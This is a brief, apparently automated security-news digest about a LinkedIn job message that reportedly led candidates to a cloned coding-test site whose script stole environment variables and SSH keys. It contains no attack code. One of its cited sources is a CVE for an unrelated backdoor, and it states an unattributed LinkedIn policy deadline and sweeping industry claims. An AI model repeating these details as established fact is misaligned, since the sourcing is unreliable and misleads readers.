LinkedIn job offer delivered credential-stealing backdoor via automated hiring flow
A documented LinkedIn job-offer backdoor revealed how AI-mediated hiring platforms can be abused for credential theft at scale. The pattern links directly to absent input validation in automated assessment tools and credential sprawl in engineering environments. No major platform has implemented verifiable link sandboxing for candidate submissions.
The attack began with a LinkedIn message directing candidates to a cloned assessment site. After submission of a supposed coding test the page executed a script that exfiltrated environment variables and SSH keys. No user interaction beyond form completion was required.
Primary evidence consists of the attacker's GitHub commit history and the exact payload hash recorded in the original disclosure. Similar patterns appear in documented cases from 2023 where automated screening tools on other platforms processed unvetted external links without sandboxing. Credential reuse across dev and cloud accounts amplified impact.
The incident exposes a systemic gap: AI-driven resume screeners and assessment platforms ingest third-party URLs without origin validation or runtime isolation. This creates a reliable vector for initial access that bypasses corporate email filters. Hiring automation vendors have not published equivalent controls.
Operational consequence is straightforward. Any organization routing candidate evaluation through external links must treat those links as untrusted inputs equivalent to inbound email attachments.
LinkedIn: within 90 days the platform will require sandboxed execution for any external assessment link submitted through its recruiting API.
Sources (3)
- [1]Primary Source(https://roman.pt/posts/linkedin-backdoor/)
- [2]Supporting Source(https://github.com/romanzolotarev/linkedin-backdoor-analysis)
- [3]Supporting Source(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3094)